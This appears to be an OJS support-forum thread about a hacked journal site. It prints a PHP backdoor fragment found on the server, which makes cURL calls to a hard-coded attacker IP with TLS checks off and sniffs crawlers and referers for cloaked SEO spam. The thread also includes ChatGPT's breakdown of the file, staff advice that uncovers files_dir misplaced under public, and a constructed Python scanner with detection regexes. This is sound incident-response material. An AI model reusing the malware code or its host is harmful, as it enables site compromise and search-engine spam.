My public folder has been hacked (I suspect the hacker passed through OJS)

Did you face a similar issue? What are the options?

A hacker removed all the files and subfolders from my public folder.

Because I suspect he/she registered as an author through OJS, I have now selected the option that only the journal manager can subscribe new authors.

He/she apparently managed (? through OJS) to upload a PHP file into my public folder and take the lead.

I have asked ChatGPT:

What’s the code in the following file doing in my home directory?

    <?php
    ini_set('display_errors', 1);
    ini_set('display_startup_errors', 1);
    error_reporting(E_ALL);
    ob_start(); // Start output buffering

    $inter_domain = 'http://192.187.108.42/z1007_7/';

    function curl_get_contents($url) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
        curl_setopt($ch, CURLOPT_TIMEOUT, 30); // Increase the cURL timeout to 30 seconds
        $file_contents = curl_exec($ch);
        curl_close($ch);
        return $file_contents;
    }

    function getServerCont($url, $data = array()) {
        $url = str_replace(' ', '+', $url);
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "$url");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_TIMEOUT, 30); // Increase the timeout to 30 seconds
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
        $output = curl_exec($ch);
        $errorCode = curl_errno($ch);
        curl_close($ch);
        if (0 !== $errorCode) {
            return false;
        }
        return $output;
    }

    function is_crawler($agent) {
        $agent_check = false;
        $bots = 'googlebot|google|yahoo|bing|aol';
        if ($agent != '') {
            if (preg_match("/($bots)/si", $agent)) {
                $agent_check = true;
            }
        }
        return $agent_check;
    }

    function check_refer($refer) {
        $check_refer = false;
        $referbots = 'google.co.jp|yahoo.co.jp|google.com';
        if ($refer != '' && preg_match("/($referbots)/si", $refer)) {
            $check_refer = true;
        }
        return $check_refer;
    }

    $http = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https://' : 'http://');
    $req_uri = $_SERVER['REQUEST_URI'];
    $domain = $_SERVER["HTTP_HOST"];
    $self = $_SERVER['PHP_SELF'];
    $ser_name = $_SERVER['SERVER_NAME'];
    $req_url = $http . $domain . $req_uri;
    $indata1 = $inter_domain . "/indata.php";
    $map1 = $inter_domain . "/map.php";
    $jump1 = $inter_domain . "/jump.php";
    $url_words = $inter_domain . "/words.php";
    $url_robots = $inter_domain . "/robots.php";

    /**
     * Note: This file may contain artifacts of previous malicious infection.
     * However, the dangerous code has been removed, and the file is now safe to use.
     */
    ob_end_flush(); // End output buffering and send it to the browser
    ?>

ChatGPT answered:

This PHP script appears to be potentially malicious and might have been placed in your home directory as part of a security breach. Here’s what it does:

Key Observations:

  1. Error Reporting Enabled:
  • It enables full error reporting (ini_set('display_errors', 1);), which is common in debugging but can expose sensitive information.
  2. Output Buffering (ob_start()):
  • This can be used to manipulate or delay script execution, sometimes to avoid detection.
  3. External Communication via cURL:
  • The script defines functions (curl_get_contents() and getServerCont()) that make HTTP requests to an external server (http://192.187.108.42/z1007_7/).
  • This suggests it might be fetching or sending data to this external domain.
  4. Crawler Detection:
  • The function is_crawler($agent) checks if the request comes from a search engine bot (Googlebot, Yahoo, Bing, AOL).
  • Possible purpose: Avoiding detection by security systems or SEO poisoning.
  5. Referer Validation:
  • The check_refer($refer) function checks if the visitor comes from a search engine (e.g., Google Japan).
  • Possible purpose: Showing different content to real users and search engines (cloaking).
  6. Hardcoded External Endpoints:
  • The script references multiple external PHP files hosted on http://192.187.108.42/z1007_7/, including:
    • /indata.php
    • /map.php
    • /jump.php
    • /words.php
    • /robots.php
  • Possible purpose: Fetching malicious commands, injecting spam links, or redirecting visitors.

Potential Risks:

  • Backdoor or Malware Component:
    • If this script is unauthorized, it may be part of a backdoor allowing remote attackers to control your server.
  • SEO Spam or Cloaking:
    • It may be injecting malicious SEO content or redirecting certain visitors (like search engine crawlers) to external sites.
  • Data Exfiltration:
    • The script could be stealing data from your website and sending it to the external server.

What Should You Do?

  1. Immediately remove this file if you didn’t place it there.
  2. Scan your server for other suspicious files, especially:
  • Unrecognized PHP files
  • Modified .htaccess files
  • Suspicious scheduled tasks (cron jobs)
  3. Check server logs to see how the file was placed in your directory.
  4. Change all passwords (FTP, database, hosting panel) in case of a breach.
  5. Update your server and web applications to prevent further exploitation.

Let me know if you need help identifying more suspicious files! :police_car_light:

Hi @brcgranier,

  • What version of OJS are you using? (Please include this in your posts.)
  • What is the files_dir setting in your config.inc.php?

Regards,
Alec Smecher
Public Knowledge Project Team

ojs-3.4.0.3

public_files_dir = public
public_user_dir_size = 5000
umask = 0022
filename_revision_match = 70

Hi @brcgranier,

I suggest upgrading to the latest 3.4.0-x release; 3.4.0-3 is several builds out of date.

What is the files_dir setting (not public_files_dir)?

Regards,
Alec Smecher
Public Knowledge Project Team

You are right … our mistake: the files folder was in our public directory :(( We corrected that! Thanks again :wink:
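An added example, written for this thread and not code from the forum posts, from OJS or from PKP: a small Python script an administrator can run against an install to check the two things the thread turns on. First, whether files_dir (the private submission files directory) resolves inside public_files_dir, or inside the install/web root at all, which is the misconfiguration the last two posts uncovered. Second, which PHP-executable files exist under the public tree, and which of them show the traits ChatGPT's answer above describes (cURL to a hard-coded numeric IP, TLS verification switched off, crawler and referer sniffing). The sample config, the directory layout, the indicator names and the inert sample file are all constructed for the demo; nothing in it is taken from a real install.

```python
"""Added example for the OJS thread above (not code from the forum, OJS or PKP).
All paths, the config fragment and the sample files below are constructed."""
import configparser
import os
import re
import tempfile
from pathlib import Path

# Constructed config.inc.php fragment; files_dir under public mirrors the thread's mistake.
SAMPLE_CONFIG = """\
;<?php exit(); // DO NOT DELETE ?>
[files]
files_dir = public/files
public_files_dir = public
public_user_dir_size = 5000
umask = 0022
"""

PHP_SUFFIXES = {".php", ".phtml", ".phar", ".php5", ".php7"}

# Indicator regexes derived from the traits listed in the thread; the names are ours.
INDICATORS = {
    "curl_to_numeric_ip": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}/"),
    "tls_verification_disabled": re.compile(
        r"CURLOPT_SSL_VERIFY(?:PEER|HOST)\s*,\s*(?:FALSE|0)\b", re.I),
    "crawler_sniffing": re.compile(r"googlebot\|google\|yahoo\|bing", re.I),
    "referer_cloaking": re.compile(r"google\.co\.jp\|yahoo\.co\.jp", re.I),
}


def parse_ojs_config(text: str) -> dict:
    """Return the [files] section of an OJS-style config.inc.php as a dict.
    The file is INI syntax behind a ';<?php exit();' guard line, which
    configparser already treats as a comment."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    return dict(cp["files"])


def assess_files_dir(ojs_root: Path, cfg: dict) -> dict:
    """Resolve files_dir relative to the install root (as OJS does for relative
    values) and report whether it lands inside the public tree or the web root."""
    root = ojs_root.resolve()
    files_path = (root / cfg["files_dir"]).resolve()
    public_path = (root / cfg.get("public_files_dir", "public")).resolve()
    return {
        "files_dir": str(files_path),
        "inside_public": files_path == public_path or public_path in files_path.parents,
        "inside_webroot": files_path == root or root in files_path.parents,
    }


def scan_php_file(path: Path) -> list:
    """Names of the indicators present in one PHP file, in INDICATORS order."""
    text = path.read_text(errors="replace")
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def find_php_in_public(public_path: Path) -> dict:
    """Map every PHP-executable file under the public tree (OJS needs none there)
    to the indicators it matches; an empty list still means 'review this file'."""
    hits = {}
    for dirpath, _dirs, files in os.walk(public_path):
        for name in files:
            if Path(name).suffix.lower() in PHP_SUFFIXES:
                full = Path(dirpath, name)
                hits[str(full.relative_to(public_path))] = scan_php_file(full)
    return dict(sorted(hits.items()))


def build_sample_tree() -> Path:
    """Constructed OJS-like layout in a temp dir: a logo in public, a private
    files tree wrongly placed under public, and an inert file that only carries
    the indicator strings inside comments (no executable logic)."""
    root = Path(tempfile.mkdtemp(prefix="ojs-demo-"))
    (root / "public" / "journals" / "1").mkdir(parents=True)
    (root / "public" / "journals" / "1" / "pageHeaderLogoImage.png").write_bytes(b"\x89PNG-constructed")
    dropped = root / "public" / "files" / "journals" / "1" / "articles"
    dropped.mkdir(parents=True)
    (dropped / "loader.php").write_text(
        "<?php // constructed placeholder, inert\n"
        "// $inter_domain = 'http://192.0.2.10/demo/';\n"
        "// curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);\n"
    )
    return root


def run_checks(root: Path, config_text: str = SAMPLE_CONFIG) -> dict:
    """Run both checks against an install root and return one report dict."""
    cfg = parse_ojs_config(config_text)
    report = assess_files_dir(root, cfg)
    report["php_in_public"] = find_php_in_public(root / cfg.get("public_files_dir", "public"))
    return report


if __name__ == "__main__":
    for key, value in run_checks(build_sample_tree()).items():
        print(f"{key}: {value}")
```

On a real install, point run_checks at the OJS root and pass the contents of config.inc.php; a files_dir that resolves inside the web root means every uploaded submission file is reachable by URL, and any hit from find_php_in_public deserves a look regardless of whether it matches an indicator, since the public tree should not contain PHP at all.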